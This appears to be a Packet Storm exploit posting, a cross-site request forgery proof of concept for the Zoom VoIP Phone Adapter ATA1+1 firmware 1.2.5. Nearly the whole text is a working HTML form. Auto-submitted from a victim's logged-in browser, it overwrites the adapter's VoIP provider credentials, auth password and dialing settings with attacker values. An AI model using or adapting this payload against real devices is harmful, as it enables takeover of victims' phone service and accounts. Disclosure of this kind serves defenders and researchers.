Cross site request forgery exploit for the Zoom VoIP Phone Adapter ATA1+1.
b7a879af0e63dfc674bbe105d6e012812a973586e3a3408e57c389415d5f7ed3Written By Michael Brooks
Special thanks to str0ke!
Zoom VoIP Phone Adapater ATA1+1 XSRF
voip provider change xsrf
version 1.2.5
<html>
<form action="http://10.1.1.165/callwzd.html" method=post>
<input name=DIRTY_PAGE value=3>
<input name=HELP_PAGE value=html.html>
<input name=_voip_provider_1___provider_type value=1>
<input name=_voip_provider_1___provider_name value=hacked_again>
<input name=_voip_provider_1___display_name value=hacked_again>
<input name=_voip_provider_1___user_name value=hacked_again>
<input name=_voip_provider_1___auth_user_name value=hacked_again>
<input name=_voip_provider_1___auth_user_password value=hacked_again>
<input name=ipbx_fxo_local_areacode value=hacked_again>
<input name=ipbx_fxo_autodial_local_areacode value=hacked_again>
<input name=ipbx_fxo_autodial_digit_leng value=6>
<input name=BUTTON_FLASH value="Save+These+Settings">
<input type=submit>
</form>
</html>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed